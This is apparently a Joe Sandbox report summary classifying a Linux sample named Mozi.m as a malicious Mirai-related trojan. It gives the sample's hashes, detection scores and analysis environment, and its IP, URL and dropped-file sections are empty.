
Mozi.m

Status: finished
Submission Time: 2020-04-18 04:06:37 +02:00
Malicious
Tags: Spreader, Trojan, Evader, Mirai

Details

  • Analysis ID: 223572
  • API (Web) ID: 343774
  • Analysis Started: 2020-04-18 04:13:59 +02:00
  • Analysis Finished: 2020-04-18 04:20:21 +02:00
  • MD5: 4dde761681684d7edad4e5e1ffdb940b
  • SHA1: 2327be693bc11a618c380d7d3abc2382d870d48b
  • SHA256: d546509ab6670f9ff31783ed72875dfc0f37fa2b666bd5870eecaaed2ebea4a8
Joe Sandbox

  • Detection: malicious
  • Score: 100
  • System: Ubuntu Linux 16.04 x64 (Kernel 4.4.0-116, Firefox 88.0, Document Viewer 3.18.2, LibreOffice 5.1.6.2, OpenJDK 1.8.0_171)

Third Party Analysis Engines

  • malicious, Score: 37/59
  • malicious, Score: 16/40
  • malicious, Score: 17/31
  • malicious

IPs


URLs


Dropped files
